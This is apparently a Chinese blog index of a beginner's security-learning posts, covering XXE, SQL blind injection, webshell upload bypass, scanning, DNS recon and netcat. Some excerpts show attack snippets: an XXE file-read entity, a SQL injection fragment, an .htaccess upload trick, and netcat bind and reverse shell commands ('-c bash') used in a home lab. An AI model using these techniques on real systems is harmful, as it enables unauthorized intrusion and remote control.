- 博客(38)
- 收藏
- 关注
RSS订阅原创 XXE漏洞学习笔记
一、XML定义看一段示例<?xml version="1.0" encoding="ISO-8859-1"?> //用来说明xml格式的数据的开始,告诉xml解析器版本号<!DOCTYPE foo [ //DTD文档的开始<!ELEMENT foo ANY > //创建一个元素<!ENTITY xxe SYSTEM "file:///c:/test.dtd" >]> //定义一个外部实体<creds>
2021-06-05 19:53:32
347
1
原创 一个蓝队的思考复盘
参加完 hw 总结总结思考思考限于水平 写到地方可能有限 还望各位师傅能多多指点想到之前看的一篇文章 阿里云内部攻防演练中 攻击队进去之后升级了内网的一台电视机的版本导致攻击路径暴露 更是深刻感受到了一个优秀的蓝队要考虑到的方面太多了一、发现风险当接手这个项目的时候 我第一步先做的是信息收集着眼点在以下几个方面1、暴露在互联网中的资产web页面——中间件、CMS、框架 的版本以及类型对应的IP以及其C段–——易发现被遗忘的各类设备、以及忘关闭的测试环境IP开放端口2、暴露在互联网中的个人
2021-05-16 10:03:43
809
5
原创 SQL注入——盲注(left方法)
SQL注入——盲注(left方法)1、拿到题目后首先判断闭合规则,目前有如下几种情况select id=’ ’select id=" "select id=’( )’select id="( )"select id =( )二、fuzz规则通过 order by 10000 --+ 来作为结尾 前面fuzz数据库的闭合规则在id = 1“ 时 页面回显异常 说明 闭合方式为第二种 双引号闭合三、之后开始猜测数据库名第一条payload为 id=1" and left(database
2020-11-04 15:51:27
2626
原创 WebShell文件上传漏洞分析溯源(第1题)
方法一、后缀名绕过先上传一个正常的文件成功上传并回显路径之后F12查看网络信息,可以看到网站架构为PHP+Apache2.4.7直接上传phpwebshell将后缀修改为php3文件成功上传,之后蚁剑连接方法二、.htaccess上传一个.htaccess文件文件内容为SetHandler application/x-httpd-php意为将文件夹中的内容全都当作php文件来解析之后上传一个图片格式的phpinfo之后访问phpinfo图片phpinfo被成功编译
2020-08-27 15:49:17
406
原创 (python)turtle入门级画图练习
0X01 目标画出一个奥运五环0x02 思路我们知道turtle绘图是以直角坐标系为参考画出的图于是我们的想画出的图形大致位置如下图0x03简单的Turtle语句使用的温习导出画布 turtle.showturtle在当前指针位置写下文字 turtle.write("Welcome to Python")指针向前移动100 turtle.forward(100)...
2020-03-21 22:50:52
1679
原创 (web)Web学习笔记(1)-----HTML
0x01:基本概念什么是HTML:HTML的英文全称是 Hypertext Marked Language,即超文本标记语言。HTML是由Web的发明者 Tim Berners-Lee和同事 Daniel W. Connolly于1990年创立的一种标记语言,它是标准通用化标记语言SGML的应用。用HTML编写的超文本文档称为HTML文档,它能独立于各种操作系统平台(如UNIX, Windows...
2020-03-20 20:46:09
325
原创 (web)记录自己从零起步搭建网站遇到的问题以及思路(一)
0X01:起因由于未经授权对网站进行渗透测试属于违法行为,因此想学习自己搭建一个网站 也能通过搭建网站的过程更好的理解渗透过程
2020-03-15 09:35:21
407
原创 (网络安全)科普:关于漏洞我们需要知道什么
0X01:什么是漏洞漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。攻击者可以利用漏洞对信息系统进行攻击或控制,窃取重要资料,篡改用户数据,或作为入侵其他主机系统的跳板0X02:漏洞的种类:口令失窃-----黑客进行弱口令(指很简单的账号密码),字典爆破(基于目标信息生成字典,之后逐个尝试),暴力破解等手段获取密码,实现攻击...
2020-03-09 23:40:09
926
原创 (网络安全)nmap可实现的功能以及使用方法
0X01:NMAP是什么Nmap(网络映射器)是一款用于网络发现和安全审计的网络安全工具,它是自由软件。软件名字Nmap是Network Mapper的简称。通常情况下,Nmap用于:列举网络主机清单管理服务升级调度监控主机服务运行状况Nmap可以检测目标主机是否在线、端口开放情况、侦测运行的服务类型及版本信息、侦测操作系统与设备类型等信息。 它是网络管理员必用的软件之一,用以评估网络...
2020-03-07 17:59:08
1845
原创 (网络安全)主动信息收集 服务扫描
在上一节中 我们可以扫描出目标主机开启的端口但是要注意的是 我们不能简单的仅从目标开启端口号 就判断目标一定开启了什么服务例如 有可能把邮件服务开在80端口上Banner捕获服务识别操作系统识别SNMP分析防火墙识别Banner信息收集什么是banner信息:nc -nv 192.168.31.1 22由于scapy只能作用在第二层和第三层要想订制应用层的数据包就要使用...
2020-03-05 09:02:33
421
原创 (网络安全)主动信息收集---端口扫描同时配合wireshark分析
在发现主机存活后,我们便可以进行下一步渗透测试,利用端口,从有漏洞的应用程序进入,实现渗透工作UDP端口扫描使用的技术与发现主机时使用的技术相同 :##都是ICMP端口不可达思路是返回icmp报文的 都是不开放的UDP扫描在确认主机存活的前提下 准确性高 但是 犹豫有6万多个端口 使得 扫描耗时较大(但是还是比TCP快)Scapy UDP Scan测试 物理主机 能不能使用udp...
2020-03-04 19:52:34
1698
原创 (网络安全)主动信息收集 第四层
优点:结果更可靠一些被防火墙过滤的概率较低缺点:基于状态过滤的防火墙 可能过滤扫描全端口扫描速度慢TCP未经请求的ACK——会收到目标主机返回的RST包 来判断目标是否在线发送SYN——对方可能会返回SYN/ACK、RSTUDP向目标主机发送一个udp数据包,如果目标的端口在主机上没有开放,目标主机会返回一个,ICMP端口不可达、一去不复返TCP发现没有进行连接,直接向目...
2020-03-03 17:24:17
424
原创 (网络安全)主动信息收集 第三层网络层
arp协议由于不能够通过路由器进行转发边界或者网络路由设备会设置屏蔽icmp数据包响应ping命令ping 1.1.1.1 -ctraceroute www.sina.com 路由追踪原理利用ttl值从1开始逐渐提升进行抓包Scapyi = IP()p = ICMP()ping = (i/p)ping.display()//设置dst目标地址字段ping[IP].dst =...
2020-03-02 18:19:04
698
原创 (协议分析)通过抓包分析HTTP协议以及包中内容
因为网络安全往往需要一门脚本语言的支持,不然只能用着别人的工具。因此决定从学习编写一只爬虫开始,来入门python掌握一门脚本语言,学习爬虫,当然与http协议离不了关系,因此先分析一下http的工作流程HTTP协议1.什么是HTTPhttp协议是超文本传输协议,它定义了浏览器和服务器之间的通信规则,...
2020-02-27 19:04:02
2700
原创 主动信息收集---第二层数据链路层发现
直接与目标系统交互通信无法避免留下访问的痕迹使用受控的电放电脑进行探测1.发现-- 二层(数据链路层)发现优点:速度快,可靠缺点:不能进行路由,只能发现本网段的利用Arp协议arping使用方法arping 192.168.1.1 -c 1//ping自己的网关地址 参数c表示发出几个数据包抓一下包arping -d //不同的mac地址返回同一个ip,发现重复的响应,发...
2020-02-25 11:03:30
447
原创 maltego
matelgo是一款特别强大的搜索工具,他不仅可以进行多方面的搜索,还可以自动将搜索结果可视化----初始界面点击有上角新建之后如图我们从左边拖一个目标dns服务过来之后双击填入信息修改信息后右键点击就会出现许多选项,可以得到目标的ip地址、dns记录、dns服务器地址、域名和子域名、以及whois信息等等,不过(现在大部分功能都收费了)...
2020-02-17 16:32:03
518
3
原创 进阶方法使用google搜索引擎
想要搜索 “ 支付”支付利用符号进行筛选过滤1.想要搜索的页面中包含 “支付” 但是不包含“充值”+支付 -充值2.支付或充值支付 充值(中间加了空格)3.支付和充值都要有“支付”“充值”利用html元素进行筛选搜出来的页面标题要为口香糖intitle:口香糖搜出来的页面要包含内容:口香糖intext:口香糖从指定网站进行搜索site:alibaba.com...
2020-02-17 10:58:31
948
原创 shodan
我们可以使用多种参数在shodan上进行查询例如对ip地址进行查询时可以输入net:8.8.8.8就能够获得目标所使用的服务器版本、物理地址、开启的端口号等大量信息也可以输入port:22来筛选那些打开22端口的主机我们通过shadon可以得到目标物理地址 打开端口 操作系统 甚至还能看到其一些漏洞shodan的大致用法就是这些 由于它的搜索引擎相较于之前的代码来说 语法没有那么的严格...
2020-02-16 17:08:46
282
原创 dns信息收集——区域传输、字典爆破(dnsdict6安装)、whois注册信息
dns区域传输对已知域名查询相关信息,我们可以使用nslookup、dig等命令例如 我们如果查询sina.com 仅能查出sina.com的相关信息是查不到如www.sina.com bbs.sina.com 这些主机域名的区域传输原本是发生在dns服务器之间的数据数据同步的过程,一般情况下区域传输只发生在本域的dns服务器之间,但是一些粗心的管理员 可能配置错误 导致任何人都能与dns...
2020-02-16 12:40:13
649
原创 dig基本介绍+利用wireshark和dig命令学习dns整个过程
dig跟上次学到的nslookup用法大同小异,但是功能上更强大一些dig语法dig sina.com any 8.8.8.8 在信息收集过程中可以尝试更换多个域名服务器对域名进行查询 因为会出现不同的结果 可以获得多个目标信息dig的更多功能输出结果进行筛选-noall 什么都不显示2.反向查询dig命令的强大之处1.可以查询dns服务器的debian版本dig -no...
2020-02-14 13:57:00
1032
原创 重启虚拟机后进行连接网络要很久问题加思路
今天在打开kali虚拟机时,发现网络连接不上,一直在转圈圈 最后连接不上自己也没有进行任何网络配置 突然就没有网络连接两台虚拟机都是桥接模式 桥接在一块物理网卡上感觉配置应该没问题——————————————————想想自己昨天在学习nslookup时输入了命令 server 8.8.8.8 修改了dns服务器地址是这个问题吗?随后对任意网络都ping不通 提示无连接 所以应该不...
2020-02-11 22:51:44
760
原创 路由器 三层交换机 网关有什么区别
最近学习计算机网络原理的过程中,使用的是《自顶向下方法》,书中没有提到过网关和三层交换机的概念,可是老能从周围听到这两个概念 于是查了些资料 有了如下的理解首先说网关网关(Gateway)又称网间连接器、协议转换器。网关在网络层以上实现网络互连,是复杂的网络互连设备,仅用于两个高层协议不同的网络互连。网关既可以用于广域网互连,也可以用于局域网互连。网关是一种充当转换重任的计算机系统或设备...
2020-02-09 00:03:23
2229
1
原创 渗透测试过程中文档的记录
在一次团队渗透测试过程中,每个人都有各自的分工,同时需要对各自得到的日志文件进行保存和分享1.dradis这是一个基于web的工具使用前需要开启服务随后进入这个页面使用时不需要账号,但要输入一个用户名(登录时随便输入),用来对团队人员进行标识,因为渗透测试发生在短期,如果还需要维护一个成员的账号密码,就显得过于繁琐之后可以在里面上传文件 任务分工 构建自己任务思路框架 将收集到的信...
2020-02-08 19:45:42
486
原创 不使用图形化纯字符下的抓包——tcpdump 使用方法
当我们在服务器端时,因为没有图形化界面,虽然wireshark也可以工作在命令行界面,但是也是需要下载这时我们要考虑另一种抓包方法tcpdumptcpdump -i eth0 -s 0 -w file.pcap //i表示抓哪个接口的数据包 s表示抓数据包的大小 0表示包有多大抓多大 w 表示将抓到的数据包保存到哪里输入命令后,开始抓包之后输入命令读取数据包tcpd...
2020-02-07 18:06:59
369
原创 小白在使用tcpdump抓包练习时,竟然发现这种流量!!!!!(大误)
今天在使用tcpdump在虚拟机中抓包时,发现网中出现的奇怪的流量背景:kali linux虚拟机 没进行任何活动 也没有装其他软件所以排除是计算机中其他软件产生的流量抓到的包如图对我一个萌新来说,的确吓了一跳,第一反应就是 被黑了???(笑)首先想看看这个xiaoqiang是怎么回事于是百度了xiaoqiang真的被黑了??好刺激啊百度里面的建议都是叫杀毒叫杀进程 (大误)我...
2020-02-07 16:41:24
555
原创 wireshark实战以及大部分企业网络流量分析
实验目的:在两台虚拟机上通过nc和nccat分别建立连接,之后抓取两者通信时发送的数据包实验准备:主机A ip:192.168.31.113 主机B ip:192.168.31.213两台虚拟机使用桥接模式连接同一块网卡(方便看到实验结果)nc方式连接抓包过程实验流程:0.打开wireshark 抓取eth0上的数据1.利用nc建立两台主机之间的连接主机Anc -lp 333...
2020-02-03 17:45:45
985
原创 NC——远程控制(加部分思路)
上一篇文章讲了nc的传输功能,这一篇讲一下nc的远程控制功能控制方法(正向)主机A :nc -lp 333 -c bash主机B : nc -nv 192.168.31.113注释: 主机A侦听333端口 并将自己的shell 交给通过该端口连接的主机(反向)主机A: nc -lp 333主机B:nc -nv 192.168.31.113 333 -c bash注释 :主机A侦听...
2020-02-01 20:49:35
1514
原创 netcat——nc
netcat可以实现的功能1.连接目标主机的端口作为客户端连接nc -vn连接目标主机,并参数v表示显示详细信息,n为不要进行域名解析(因为使用nc来进行域名解析速度较慢,加了n后面必须加ip地址)例如 :想要连接163的pop3服务器,先通过ping命令得到其ip地址之后进行作为参数进行连接连接163的pop3服务器的110 端口提示该端口号打开着,并且收到了来自服务器的...
2020-02-01 17:38:58
538
原创 防火墙的各项简单配置以及实例(基于m0n0wall)
如图我们登录上防火墙domain 域名实验:修改为aaasss后打开浏览器输入 m0n0wall.aaasss.com后防火墙规则设置#######行为:防火墙遇到下面的包所采取的动作行为有三种 1.通过 2.拒绝 3.阻止(block)注:此处的拒绝和阻止之间的区别是:拒绝时,发送者会受到被拒绝的信息 而阻止 是直接将包丢弃发送方收不到信息 拒绝只工作在t...
2020-01-18 10:01:54
1190
原创 渗透实验环境的搭建
为了更好的学习渗透,已经理解整个工作环境的组成,因此我们决定自己搭建实验环境一、实验环境拓朴图我们这里采用m0n0wall来作为我们的防火墙M0n0wall是基于FreeBsd内核开发的免费软件防火墙。m0n0wall提供基于web的配置管理、提供VPN功能、支持DHCPServer、DNS转发、动态DNS、Ipsec、流量控制、无线网络支持等功能。该系统最新版本是1.8.1,最稳定版...
2020-01-17 12:00:32
645
原创 解决kali linux字体乱码问题(纯新人向)
安装好kali之后,发现字体全都是方框,是因为系统缺少字体文件首先要对字体进行安装注:新版kalil inux是不带安装源的,要求我们自己手动添加更新源首先输入打开终端ctrl+alt+t接下来输入vi /etc/apt/sources.list按i进入编辑模式添加更新源##kali官方源 deb http://http.kali.org/ kali-rolling main...
2020-01-15 12:35:14
1815
2
原创 我的第一个简单的不能再简单的shell脚本
vi 1.sh /创建一个名为1的文件按i进入编辑模式 #!/bin/bash 使用此对语言进行解释 echo -n "IP:" -n是指光标不变行 read ip 定义一个变量ip echo “your ip is :”$ip对脚本进行权限修改 chmod +x 2.sh执行脚本 ./2.sh...
2020-01-12 19:02:27
175
原创 Linux kali操作命令
1.ls命令ls列出当前目录的文件蓝色为目录 白色为普通文件 绿色为可执行文件 红色为压缩文件ls -l显示当前目录文件的详细信息2.cd命令cd切换到该目录cd ..返回到上一级目录中pwd显示当前工作下的目录3.查看文件时所用的命令 cat more lesscat /var/log/messages显示文件的全部内容(不适用于大文件,数量太大)mo...
2020-01-12 11:32:32
4088
原创 安装了12个小时的kali虚拟机,碰上的各种弯路(最终解决方法在另一篇文章里)
1.下载虚拟机链接:https://pan.baidu.com/s/1bI8LReRY-5k81O3rrNgg-A 提取码:6c032.安装
2020-01-11 07:59:43
1673
原创 wireshark使用方法详解
一.抓包环境本机大多数情况下的抓包交换机网络交换机网络中,PC2与PC3之间通信的流量很难流到PC1中,因此在中大型网络中,往往利用软件在交换机上设置一个span口,将其他主机通信的流量copy一份,来实现监测整个网络。ARP欺骗当没有权限在交换机端口上设置span口时,采取arp欺骗来得到PC2和PC3的数据包MAC地址泛洪向交换机发送大量的MAC地址,使得交换...
2020-01-09 22:06:05
1745
原创 小白自学网安日记day(1)
一、利用telnet与网站建立连接,从而不使用浏览器1.在命令行输入 telnet(若显示无效命令行需要在控制面板——程序与功能——打开telnet服务)2.与百度建立连接 telnet www.baidu.com 803. Ctrl+]4. GET/index.php HTTP/1.1host:www.baidu.com5二...
2020-01-08 21:41:49
363
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人